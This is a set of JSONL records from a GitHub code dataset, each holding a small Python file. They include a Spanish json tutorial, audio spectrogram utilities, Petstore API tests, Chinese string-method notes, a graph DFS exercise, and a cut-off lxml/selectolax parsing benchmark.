json\r\njson.loads #convertir de json a python\r\njson.dump #nos permite enviar info hacia un archivo\r\njson.load #nos permite recuperar info de un archivo\r\n\r\nentero = 33\r\njsonEntero = json.dumps(entero) #convierte a formato json\r\nprint(type(jsonEntero))\r\npythonEntero = json.loads(jsonEntero) #convierte a formato python\r\nprint(type(pythonEntero))\r\n\r\n\r\ncadena = 'Hola mundo'\r\njsonCadena= json.dumps(cadena)\r\nprint(type(jsonCadena))\r\npythonCadena = json.loads(jsonCadena)\r\nprint(type(jsonCadena))\r\n\r\n\r\nlista = [1,2,'tres']\r\njsonLista = json.dumps(lista) #representa en formato json la lista\r\npythonLista = json.loads(lista) #vuelve a la version de python\r\n\r\n\r\ndiccionario = {'entero':1, 'cadena':'hola', 'lista':[1,2,'tres', 4.4]}\r\njsonDiccionario = json.dumps(diccionario)\r\nprint(type(jsonDiccionario))\r\npythonDiccionario = json.loads(jsonDiccionario)\r\nprint(type(pythonDiccionario))\r\n'''\r\ndiccionario = {'entero':1, 'cadena':'hola', 'lista':[1,2,'tres', 4.4]}\r\n\r\n#vamos a escribir en un archivo el diccionario\r\nwith open('archivo_json.json', 'w') as archivo: #abrimos el archivo\r\n json.dump(diccionario, archivo) #envio la info con dump(que quiero enviar, donde lo quiero escribir)\r\n\r\n\r\n#vamos a recuperar esa info\r\nwith open('archivo_json.json', 'r') as archivo: #abrimos el archivo\r\n datos = json.load(archivo) #envio la info con dump(que quiero enviar, donde lo quiero escribir)\r\n\r\nprint(datos)","repo_name":"faculezcano2/learn-python","sub_path":"pythoncourse/formatoJSON.py","file_name":"formatoJSON.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"44058275287","text":"import torch\nimport librosa\nimport numpy as np\n\nSAMPLE_RATE = 16000\nFRAME_SHIFT = 0.0125\nFRAME_LENGTH = 0.05\nTOP_DB = 15\nPREEMHPASIS = 0.97\nN_FFT = 2048\nHOP_LENGTH = int(SAMPLE_RATE*FRAME_SHIFT)\nWIN_LENTGH = int(SAMPLE_RATE*FRAME_LENGTH)\nN_MELS = 512\nREF_DB = 20\nMAX_DB = 100\nN_GRIFFIN_LIM_ITER = 100\nFRAME_SIZE = 1\n\ndef get_spectrograms(fpath):\n \"\"\"\n Returns mel spect from wav file.\n \"\"\"\n y, sr = librosa.load(fpath, sr=SAMPLE_RATE)\n y, _ = librosa.effects.trim(y, top_db=TOP_DB)\n y = np.append(y[0], y[1:] - PREEMHPASIS * y[:-1])\n # stft\n linear = librosa.stft(y=y,\n n_fft=N_FFT,\n hop_length=HOP_LENGTH,\n win_length=WIN_LENTGH)\n\n mag = np.abs(linear)\n # mel spectrogram\n mel_basis = librosa.filters.mel(sr=SAMPLE_RATE, n_fft=N_FFT, n_mels=N_MELS)\n mel = np.dot(mel_basis, mag)\n # to decibel\n mel = 20 * np.log10(np.maximum(1e-5, mel))\n # normalize\n mel = np.clip((mel - REF_DB + MAX_DB) / MAX_DB, 1e-8, 1)\n # Transpose\n mel = mel.T.astype(np.float32)\n\n return mel\n\ndef infinite_iter(loader):\n it = iter(loader)\n while True:\n try:\n ret = next(it)\n yield ret\n except StopIteration:\n it = iter(loader)\n\ndef save_model(model, optimizer, iteration):\n torch.save(model.state_dict(), f'model_save_iter_{iteration}.ckpt')\n torch.save(optimizer.state_dict(), f'opt_save_iter_{iteration}.opt')\n print(\"Saving model ===>>>\")","repo_name":"mkalinowski11/Voice-Conversion-Tests","sub_path":"Variational-Autencoder-VC/auto_vc_utils.py","file_name":"auto_vc_utils.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4111083883","text":"import requests\nimport json\nimport pytest\n\njson_file = 'update_pet.json'\nwith open(json_file, 'r') as file:\n request_body = json.load(file)\n\n\n@pytest.mark.order(3)\nclass TestUpdatePet:\n\n def test_status_code_is_200(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n assert response.status_code == 200, 'The status code is not 200'\n\n def test_content_type_in_response_headers(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n assert response.headers['Content-Type'] == response.headers['Content-Type'], \\\n f\"The content-type in response headers is not {response.headers['Content-Type']}\"\n\n def test_id_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert response_body['id'] == request_body['id'], 'The response id is wrong'\n\n def test_name_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert response_body['category']['name'] == request_body['category']['name'], \\\n \"The name in response body is wrong\"\n\n def test_photo_url_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert response_body[\"photoUrls\"] == request_body[\"photoUrls\"], \\\n 'The photo url is wrong in response body'\n\n def test_status_in_response_body(self):\n response = requests.put('https://petstore.swagger.io/v2/pet', json=request_body, timeout=10)\n response_body = response.json()\n assert response_body['status'] == request_body['status'], \\\n 'The status in response body is wrong'\n","repo_name":"yerdos-s/API-testing-of-Petstore.swagger.io","sub_path":"test_update_pet.py","file_name":"test_update_pet.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7345284406","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# # author:靳文龙\n# # @time: 2020/4/1 23:17\n\"1:将两个字符串紧挨着写在一起\"\nstr1 = \"Python教程\" \"http://c.biancheng.net/python/\"\nprint(str1)\n\"2: str() 和 repr() 函数将数字转换为字符串\"\n\"\"\"\nstr() 用于将数据转换成适合人类阅读的字符串形式。\nrepr() 用于将数据转换成适合解释器阅读的字符串形式(Python 表达式的形式)\n\"\"\"\n\"\"\"s 本身就是一个字符串,但是我们依然使用 str() 和 repr() 对它进行了转换。\n从运行结果可以看出,str() 保留了字符串最原始的样子,而 repr() 使用引号将字符串包围起来\n这就是 Python 字符串的表达式形式\"\"\"\ns = \"http://c.biancheng.net/shell/\"\ns_str = str(s)\ns_repr = repr(s)\nprint( type(s_str) )\nprint (s_str)\nprint( type(s_repr) )\nprint (s_repr)\n\n\"3:使用[ ]除了可以获取单个字符外,还可以指定一个范围来获取多个字符,也就是一个子串或者片段\"\nurl = 'http://c.biancheng.net/java/'\n#获取索引从3处22(不包含22)的子串\nprint(url[7: 22]) # 输出 zy\n#获取索引从7处到-6的子串\nprint(url[7: -6]) # 输出 zyit.org is very\n#获取索引从-7到6的子串\nprint(url[-21: -6])\n#从索引3开始,每隔4个字符取出一个字符,直到索引22为止\nprint(url[3: 22: 4])\n\nurl = 'http://c.biancheng.net/java/'\n#获取从索引5开始,直到末尾的子串\nprint(url[7: ])\n#获取从索引-21开始,直到末尾的子串\nprint(url[-21: ])\n#从开头截取字符串,直到索引22为止\nprint(url[: 22])\n#每隔3个字符取出一个字符\nprint(url[:: 3])\n\n\"4:汉字在 GBK/GB2312 编码中占用 2 个字节,而在 UTF-8 编码中一般占用 3 个字节\"\nstr1 = \"人生苦短,我用Python\"\n# len(str1.encode('gbk'))\n# len(str1.encode())\n\n\"5:字符串常用函数\"\n\"\"\"\nstr.split(sep,maxsplit) 方法可以实现将一个字符串按照指定的分隔符切分成多个子串,这些子串会被保存到列表中(不包含分隔符),作为方法的返回值反馈回来\nsep:用于指定分隔符,可以包含多个字符。此参数默认为 None,表示所有空字符,包括空格、换行符“\\n”、制表符“\\t”等。\nmaxsplit:可选参数,用于指定分割的次数,最后列表中子串的个数最多为 maxsplit+1。如果不指定或者指定为 -1,则表示分割次数没有限制\n\"\"\"\n\n\"\"\"\n str.join(iterable)它是 split() 方法的逆方法,用来将列表(或元组)中包含的多个字符串连接成一个字符串\n>>> list = ['c','biancheng','net']\n>>> '.'.join(list)\n'c.biancheng.net'\n\"\"\"\n\n\"\"\"\nstr.count(sub[,start[,end]])\nstr:表示原字符串;\nsub:表示要检索的字符串;\nstart:指定检索的起始位置,也就是从什么位置开始检测。如果不指定,默认从头开始检索;\nend:指定检索的终止位置,如果不指定,则表示一直检索到结尾\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.count('.', 1)\nstr.count('.',2)\nstr.count('.',2,-3)\n\n\"\"\"\nstr.find(sub[,start[,end]])\nstr:表示原字符串;\nsub:表示要检索的目标字符串;\nstart:表示开始检索的起始位置。如果不指定,则默认从头开始检索;\nend:表示结束检索的结束位置。如果不指定,则默认一直检索到结尾\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.find('.',2)\n#位于索引(2,-4)之间的字符串为“biancheng”,由于其不包含“.”,因此 find() 方法的返回值为 -1\nstr.find('.',2,-4)\n#Python 还提供了 rfind() 方法,与 find() 方法最大的不同在于,rfind() 是从字符串右边开始检索\nstr.rfind('.') #11\n\n\"\"\"\nstr.index(sub[,start[,end]])\nstr:表示原字符串;\nsub:表示要检索的子字符串;\nstart:表示检索开始的起始位置,如果不指定,默认从头开始检索;\nend:表示检索的结束位置,如果不指定,默认一直检索到结尾\n\"\"\"\n#index() 方法也可以用于检索是否包含指定的字符串,不同之处在于,当指定的字符串不存在时,index() 方法会抛出异常\n# find() 和 rfind() 一样,字符串变量还具有 rindex() 方法,其作用和 index() 方法类似,不同之处在于它是从右边开始检索\nstr = \"c.biancheng.net\"\n# str.index('z')\nstr.rindex('.') #11\n\n\"\"\"\nstartswith() 方法用于检索字符串是否以指定字符串开头,如果是返回 True;反之返回 False\nendswith() 方法用于检索字符串是否以指定字符串结尾,如果是则返回 True;反之则返回 False\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.startswith(\"c\")\nstr.startswith(\"http\")\nstr.startswith(\"b\", 2)\nstr.endswith(\"net\")\n\n\"\"\"\ntitle() 方法用于将字符串中每个单词的首字母转为大写,其他字母全部转为小写,转换完成后,此方法会返回转换得到的字符串\nlower() 方法用于将字符串中的所有大写字母转换为小写字母,转换完成后,该方法会返回新得到的字符串\nupper() 的功能和 lower() 方法恰好相反,它用于将字符串中的所有小写字母转换为大写字母\n\"\"\"\nstr = \"c.biancheng.net\"\nstr.title()#'C.Biancheng.Net'\nstr = \"I LIKE C\"\nstr.lower()#'i like c'\nstr = \"i like C\"\nstr.upper()#'I LIKE C'\n\n\"特殊字符,指的是制表符(\\t)、回车符(\\r)、换行符(\\n)\"\n\"\"\"\n字符串变量提供了 3 种方法来删除字符串中多余的空格和特殊字符,它们分别是:\nstrip():删除字符串前后(左右两侧)的空格或特殊字符。\nlstrip():删除字符串前面(左边)的空格或特殊字符。\nrstrip():删除字符串后面(右边)的空格或特殊字符。\n通过 strip() 确实能够删除字符串左右两侧的空格和特殊字符,但并没有真正改变字符串本身\n\"\"\"\nstr = \" c.biancheng.net \\t\\n\\r\"\nprint(str.strip())\nprint(\"-------------\")\nprint(str.strip(\" ,\\r\"))#'c.biancheng.net \\t\\n'\nprint(\"-------------\")\nprint(str)#' c.biancheng.net \\t\\n\\r'\nprint(\"-------------\")\nprint(str.lstrip())#'c.biancheng.net \\t\\n\\r'\nprint(\"-------------\")\nprint(str.rstrip())#' c.biancheng.net'\n\n\"\"\"\nstr.format(args)\nstr 用于指定字符串的显示样式;args 用于指定要进行格式转换的项,如果有多项,之间有逗号进行分割\n\"\"\"","repo_name":"Aigend/leetcode","sub_path":"md/net/test_string_0401.py","file_name":"test_string_0401.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"3750440962","text":"myDict={\r\n \"py\": \"python\",\r\n \"txt\":\"text\",\r\n \"java\": \"java\",\r\n \"cpp\":\"c++\",\r\n \"c\": \"c\",\r\n \"ppt\":\"power point presentation\",\r\n \"html\": \"html\",\r\n \"jpeg\":\"image\"\r\n }\r\n#print(myDict)\r\nfile = input(\"Input the file name: \")\r\nsplit = file.split(\".\")\r\nfor x in myDict:\r\n \r\n if(split[-1]==x):\r\n print(\"The extension of the file is : \"+ \"'\"+myDict[x]+\"'\")\r\n \r\n\r\n","repo_name":"Aswini2001/task1-python","sub_path":"extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31513070162","text":"\nfrom Utilities import show_pic\nfrom Wind import *\n\nclass Hole:\n def __init__(self):\n self.zones = []\n self.starting_position = (0.0, 0.0)\n self.goal_position = (0.0, 0.0)\n self.goal_zone = []\n self.name = \"\"\n self.number = 0\n self.par = 0\n self.wind = Wind()\n\n def is_in_goal(self, the_frisbee_coordinate):\n for zone in self.goal_zone:\n if zone.has_coord(the_frisbee_coordinate):\n return True\n return False\n\n def get_current_zone(self, the_frisbee_coordinate):\n for zone in self.zones:\n if zone.has_coord(the_frisbee_coordinate):\n return zone\n return None\n\n # gives tour of the hole, says wind, player says something\n def tour(self):\n print(\"Next hole is hole number \" + str(self.number) + \", \" + self.name + \". It is par \" + str(self.par) + \".\")\n raw_input(\"Press enter to see a tour of the hole: \")\n for zone in self.zones:\n show_pic(zone.picture)\n # time.sleep(0.6)\n show_pic(self.zones[0].picture)\n print(self.wind.to_string())","repo_name":"ndjenkins85/Code","sub_path":"Frisbee Golf/Hole.py","file_name":"Hole.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73208471365","text":"num = int(input()) # 컴퓨터의 수\r\nv = int(input()) # 연결선의 수\r\n\r\ngraph = [[] for i in range(num+1)] # 그래프 초기화\r\n\r\nvisited = [False]*(num+1) # 방문한 컴퓨터인지 표시 \r\n\r\nfor i in range(v): # 그래프 생성\r\n a, b = map(int, input().split())\r\n graph[a] += [b] # a에 b연결\r\n graph[b] += [a] # b에 a연결 -> 양방향\r\n \r\ndef DFS(v):\r\n visited[v] = 1\r\n for j in graph[v]:\r\n if visited[j] == 0:\r\n DFS(j)\r\n \r\nDFS(1)\r\nprint(sum(visited)-1)","repo_name":"qewr1234/beakjoon","sub_path":"9. DFS/바이러스.py","file_name":"바이러스.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29532856299","text":"# Q- find greatest of three num using recursion?\n# def greatest(a,b,c):\n# if(a>b or a>c):\n# print(f\"{a} is greatest\")\n# elif(b>a or b>c):\n# print(f\"{b} is greatest\")\n# else:\n# print(f\"{c} is greator\")\n\n# A = greatest(1,2,3)\n# print(A)\n\ndef great(n1,n2,n3):\n if(n1>n2):\n greater = n1\n else:\n greater = n2\n if(n3>greater):\n greater = n3\n return greater\n\na = great(1,34,12)\nprint(a)\n\n\n\n\n","repo_name":"teju4tech/pytohn-classes","sub_path":"chepter8-funcion&Recursion/06_greatestOF3Num.py","file_name":"06_greatestOF3Num.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31398484237","text":"# urls.py\n\nfrom django.urls import path\nfrom . import views\nfrom django.conf.urls.static import static\nfrom primeveda_backend import settings\nurlpatterns = [\n path('register/', views.register, name='register'),\n path('activate///', views.activate_account, name='activate_account'),\n path('sign-in/', views.sign_in, name='sign_in'),\n path('generate-story/', views.GenerateStoryView, name='generate_story'),\n path('current-user/', views.CurrentUserDetailView, name='current-user-detail'),\n path('search/', views.SearchAPIView, name='search-api'),\n path('update-profile/', views.update_profile, name='update-profile'),\n path('getStory/', views.get_story, name='Get_top_fifty'),\n path('getStory//', views.get_story_by_id, name='Get_story_by_id'),\n path('user/last_reading/', views.get_last_reading, name='Get_user_last_story')\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"rishuriya/primeveda_backend","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11915126318","text":"from unittest import TestCase\n\nimport numpy as np\nimport pandas as pd\n\nfrom numpy.testing import assert_allclose\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nfrom astropy.time import Time\nfrom astropy.io import ascii\nfrom km3net_testdata import data_path\n\nimport km3astro.coord as kc\nimport km3astro.frame as kf\n\nfrom km3astro.random import random_date\n\n\nclass TestCoord(TestCase):\n def setUp(self):\n self.n_evts = 100\n self.n_evts_funny = 1e2\n\n def test_neutrino_flip_degree(self):\n phi = np.array([97.07, 23.46, 97.07, 192.5, 333.33])\n theta = np.array([135.0, 11.97, 22.97, 33.97, 85.23])\n azi_exp = np.array([277.07, 203.46, 277.07, 12.5, 153.33])\n zen_exp = np.array([45.0, 168.03, 157.03, 146.03, 94.77])\n azi, zen = kc.neutrino_to_source_direction(phi, theta, radian=False)\n assert_allclose(azi, azi_exp)\n assert_allclose(zen, zen_exp)\n\n def test_neutrino_flip_radian(self):\n phi = np.array([97.07, 23.46, 97.07, 192.5, 333.33]) * np.pi / 180\n theta = np.array([135.0, 11.97, 22.97, 33.97, 85.23]) * np.pi / 180\n azi_exp = np.array([277.07, 203.46, 277.07, 12.5, 153.33]) * np.pi / 180\n zen_exp = np.array([45.0, 168.03, 157.03, 146.03, 94.77]) * np.pi / 180\n azi, zen = kc.neutrino_to_source_direction(phi, theta, radian=True)\n\n assert_allclose(azi, azi_exp)\n assert_allclose(zen, zen_exp)\n\n\nclass TestCoordRandom(TestCase):\n def test_sun(self):\n date = random_date(n=100)\n sun = kc.sun_local(date, loc=\"orca\")\n\n\nclass TestConvergenceAngle(TestCase):\n def test_convergence_angle(self):\n ca = kf.convergence_angle(1.5, 1.3)\n self.assertAlmostEqual(-0.00897440033130838, ca)\n\n\nclass TestUTMStuff(TestCase):\n def test_utm_zone(self):\n assert 38 == kf.utm_zone(np.pi / 180 * 42.8871)\n\n def test_longitude_of_central_meridian(self):\n self.assertAlmostEqual(0.785398163397448, kf.longitude_of_central_meridian(38))\n\n\nclass TestAntaresBenchmark(TestCase):\n def setUp(self):\n self.tol = 0.01 * u.deg\n self.gal_tol = 0.02 * u.deg\n\n def test_antares_objects(self):\n # FIXME\n antares_objects_data = ascii.read(\n data_path(\"astro/antares_astro_objects_benchmark.csv\")\n )\n for obj in antares_objects_data:\n time = Time(\" \".join([obj[\"date\"], obj[\"time\"]]))\n\n theta = np.deg2rad(obj[\"theta\"])\n phi = np.deg2rad(obj[\"phi\"])\n\n # check azimuth and zenith conversion\n azimuth, zenith = kc.neutrino_to_source_direction(phi, theta)\n self.assertAlmostEqual(azimuth[0], np.deg2rad(obj[\"azimuth\"]))\n self.assertAlmostEqual(zenith[0], np.deg2rad(obj[\"zenith\"]))\n\n event = kc.local_event(phi, time, theta, location=\"antares\")\n\n equat = event.fk5\n dec = equat.dec\n ra = equat.ra\n\n ref = SkyCoord(\n \" \".join([obj[\"RA-J2000\"], obj[\"DEC-J2000\"]]),\n unit=(u.hourangle, u.deg),\n frame=\"fk5\",\n )\n\n # from astropy.coordinates import Angle\n # assert np.abs(Angle(obj[\"DEC-J2000\"] + \" hours\") - event.fk5.dec) < self.tol\n # assert np.abs(obj[\"RA-J2000\"] * u.deg - event.fk5.ra) < self.tol\n\n # assert np.abs(dec - ref.fk5.dec) < 0.0001 * u.deg\n # assert np.abs(ra - ref.fk5.ra) < 0.0001 * u.deg\n\n def test_antares_coordinate_system_benchmarks(self):\n antares_objects_data = ascii.read(\n data_path(\"astro/antares_coordinate_systems_benchmark.csv\")\n )\n for obj in antares_objects_data:\n print(obj)\n time = Time(\" \".join([obj[\"date\"], obj[\"time\"]]))\n\n theta = np.deg2rad(obj[\"theta\"])\n phi = np.deg2rad(obj[\"phi\"])\n\n # check azimuth and zenith conversion\n azimuth, zenith = kc.neutrino_to_source_direction(phi, theta)\n print(\"azimuth: \", azimuth, np.rad2deg(azimuth))\n print(\"zenith: \", zenith, np.rad2deg(zenith))\n self.assertAlmostEqual(azimuth[0], np.deg2rad(obj[\"azimuth\"]))\n self.assertAlmostEqual(zenith[0], np.deg2rad(obj[\"zenith\"]))\n\n event = kc.local_event(phi, time, theta, location=\"antares\")\n print(event.fk5)\n print(event.galactic)\n\n # ref = SkyCoord(obj[\"RA-J2000\"], obj[\"DEC-J2000\"], unit=u.deg, frame=\"fk5\")\n\n assert np.abs(obj[\"DEC-J2000\"] * u.deg - event.fk5.dec) < self.tol\n assert np.abs(obj[\"RA-J2000\"] * u.deg - event.fk5.ra) < self.tol\n\n print(obj[\"gal_lat\"], event.galactic.b.deg[0])\n assert (\n np.abs(obj[\"gal_lat\"] - event.galactic.b.deg[0]) * u.deg < self.gal_tol\n )\n assert (\n np.abs(obj[\"gal_lon\"] - event.galactic.l.deg[0]) * u.deg < self.gal_tol\n )\n","repo_name":"KM3NeT/km3astro","sub_path":"tests/test_coord.py","file_name":"test_coord.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38217862887","text":"from django.urls import include, path\n\nfrom rest_framework import routers\n\nfrom money_jars.views import CurrencyViewSet, JarViewSet, OperationViewSet, TransactionViewSet\n\n\nrouter = routers.DefaultRouter()\n\nrouter.register(r'currencies', CurrencyViewSet)\nrouter.register(r'jars', JarViewSet)\nrouter.register(r'operations', OperationViewSet)\nrouter.register(r'transactions', TransactionViewSet)\n\n\nurlpatterns = [\n path(r\"money-jars/\", include(router.urls)),\n]\n","repo_name":"gontarz/money-jars","sub_path":"app/money_jars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28598414820","text":"# Készíts egy programot, amely bekéri a felhasználó nevét és életkorát. Ezután írd ki a \n# képernyőre üdvözlő üzenetet, amely tartalmazza a felhasználó nevét és azt az évet amikor született\n\nname = input(\"add meg a nevedet: \")\nage = int(input(\"add meg a korod: \"))\n\nborn = 2023 - age\n\nprint(\"neved: \", name)\nprint(\"született: \", born)\n\n\n\n","repo_name":"kadocsabenjamin/python","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73737368644","text":"\nfrom PyQt6 import QtCore, QtGui, QtWidgets\nfrom Imageprocessing import Full\n\n\nclass Ui_Form(QtWidgets.QMainWindow, Full):\n def __init__(self):\n super().__init__()\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(314, 414)\n icon = QtGui.QIcon.fromTheme(\"python\")\n Form.setWindowIcon(icon)\n self.Heading = QtWidgets.QLabel(Form)\n self.Heading.setGeometry(QtCore.QRect(20, 10, 271, 51))\n font = QtGui.QFont()\n font.setPointSize(22)\n self.Heading.setFont(font)\n self.Heading.setStyleSheet(\"\")\n self.Heading.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.Heading.setObjectName(\"Heading\")\n self.widget = QtWidgets.QWidget(Form)\n self.widget.setGeometry(QtCore.QRect(40, 80, 231, 291))\n self.widget.setObjectName(\"widget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.widget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.Normal = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.Normal.setFont(font)\n self.Normal.setObjectName(\"Normal\")\n self.buttonGroup = QtWidgets.QButtonGroup(Form)\n self.buttonGroup.setObjectName(\"buttonGroup\")\n self.buttonGroup.addButton(self.Normal)\n self.verticalLayout.addWidget(self.Normal, 0, QtCore.Qt.AlignmentFlag.AlignHCenter)\n self.Face = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.Face.setFont(font)\n self.Face.setObjectName(\"Face\")\n self.buttonGroup.addButton(self.Face)\n self.verticalLayout.addWidget(self.Face, 0, QtCore.Qt.AlignmentFlag.AlignHCenter) \n self.TT = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.TT.setFont(font)\n self.TT.setObjectName(\"TT\")\n self.buttonGroup.addButton(self.TT)\n self.verticalLayout.addWidget(self.TT, 0, QtCore.Qt.AlignmentFlag.AlignHCenter)\n self.Privacy = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.Privacy.setFont(font)\n self.Privacy.setObjectName(\"Privacy\")\n self.buttonGroup.addButton(self.Privacy)\n self.verticalLayout.addWidget(self.Privacy, 0, QtCore.Qt.AlignmentFlag.AlignHCenter)\n self.Normal.clicked.connect(self.on_click)\n self.Face.clicked.connect(self.on_click)\n self.TT.clicked.connect(self.on_click)\n self.Privacy.clicked.connect(self.on_click)\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Privacy Screenshot\"))\n self.Heading.setText(_translate(\"Form\", \"Choose a Mode!\"))\n self.Normal.setText(_translate(\"Form\", \"Normal\"))\n self.Face.setText(_translate(\"Form\", \"Taskbar\"))\n self.TT.setText(_translate(\"Form\", \"Tabs\"))\n self.Privacy.setText(_translate(\"Form\", \"Privacy (Both)\"))\n\n def on_click(self):\n if self.Normal.isChecked():\n Full.normalClicked()\n elif self.Face.isChecked():\n Full.taskbarClicked()\n elif self.TT.isChecked():\n Full.tabsClicked()\n elif self.Privacy.isChecked():\n Full.privacyClicked()\n \n\n\n\n\n\n\n","repo_name":"fromendtostart/Privacy-Screenshot","sub_path":"Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21212678182","text":"#!/usr/bin/env python3\n\"\"\"\nMost of calls of print function in this code\nuse double space at end of output string. It is to force\nmarkdown parser to enter new line, in case you want to put\noutput of test into markdown document.\n\nSee results of tests runned on different machines here:\nhttps://github.com/lorien/lxmlbench/wiki/Test-Results\n\"\"\"\nimport sys\nfrom argparse import ArgumentParser\nimport time\nfrom multiprocessing import cpu_count, Process, Value\nfrom urllib.request import urlopen\nimport os\n\nNUM_DOCUMENTS = 1000\nENGINES = ('lxml', 'selectolax')\n\n\ndef parse_cpu_info(key):\n try:\n with open('/proc/cpuinfo') as inp:\n for line in inp:\n if line.startswith(key):\n return line.split(':', 1)[1].strip()\n except IOError:\n pass\n return 'NA'\n\n\ndef parse_load_value():\n try:\n with open('/proc/loadavg') as inp:\n data = inp.read().splitlines()[0]\n return data.split(' ')[0]\n except IOError:\n pass\n return 'NA'\n\n\ndef thread_parser_lxml(parse_func, data, num_docs):\n while True:\n with num_docs.get_lock():\n if num_docs.value == 0:\n break\n num_docs.value -= 1\n val = num_docs.value\n dom = parse_func(data)\n assert 'reddit' in dom.xpath('//title')[0].text\n print('.', end='')\n\n\ndef thread_parser_selectolax(parse_func, data, num_docs):\n while True:\n with num_docs.get_lock():\n if num_docs.value == 0:\n break\n num_docs.value -= 1\n val = num_docs.value\n dom = parse_func(data)\n assert 'reddit' in dom.css('title')[0].text()\n print('.', end='')\n\n\ndef download_file(url, path):\n if not os.path.exists(path):\n print('Downloading %s to %s' % (url, path))\n with open(path, 'wb') as out:\n out.write(urlopen(url).read())\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\n '-n', '--tasks-number', type=int, default=NUM_DOCUMENTS,\n help=(\n 'Number of documents to parse.'\n ' Default is %d' % NUM_DOCUMENTS\n ),\n )\n parser.add_argument(\n '-e', '--engine',\n default='lxml',\n help=(\n 'Parsing engine, use comma to specify multiple values.'\n ' Available engines: lxml, selectolax.'\n ' Default is lxml.'\n ),\n )\n parser.add_argument(\n '-w', '--workers',\n type=int,\n help=(\n 'Run test once, only for specified number of workers.'\n ),\n )\n opts = parser.parse_args()\n total_num_cpu = cpu_count()\n\n engine_func_reg = {\n 'lxml': {\n 'thread_func': thread_parser_lxml,\n 'parser_func': None,\n },\n 'selectolax': {\n 'thread_func': thread_parser_selectolax,\n 'parser_func': None,\n },\n }\n engines = opts.engine.split(',')\n for engine in engines:\n if engine not in ENGINES:\n sys.stderr.write(\n 'Invalid value for --engine option: %s\\n' % engine\n )\n sys.exit(1)\n elif engine == 'lxml':\n from lxml.html import fromstring\n engine_func_reg[engine]['parser_func'] = fromstring\n elif engine == 'selectolax':\n from selectolax.parser import HTMLParser\n engine_func_reg[engine]['parser_func'] = HTMLParser\n\n download_file(\n 'https://raw.githubusercontent.com'\n '/lorien/lxmlbench/master/data/reddit.html',\n '.reddit.html'\n )\n with open('.reddit.html') as inp:\n data = inp.read()\n\n load_val = parse_load_value()\n model_name = parse_cpu_info('model name')\n cache_size = parse_cpu_info('cache size')\n\n for engine_idx, engine in enumerate(engines):\n if engine_idx:\n # Display new line between different engine outputs\n print('')\n print('### %s' % model_name)\n print('CPU cores: %d ' % total_num_cpu)\n print('CPU cache: %s ' % cache_size)\n print('System load before test: %s ' % load_val)\n print('Documents: %d ' % opts.tasks_number)\n print('Engine: %s ' % engine)\n\n num_docs = Value('l') # l -> signed long, 4 bytes\n\n stages = []\n if opts.workers:\n stages.append(opts.workers)\n else:\n stages.append(1)\n for mult in (0.25, 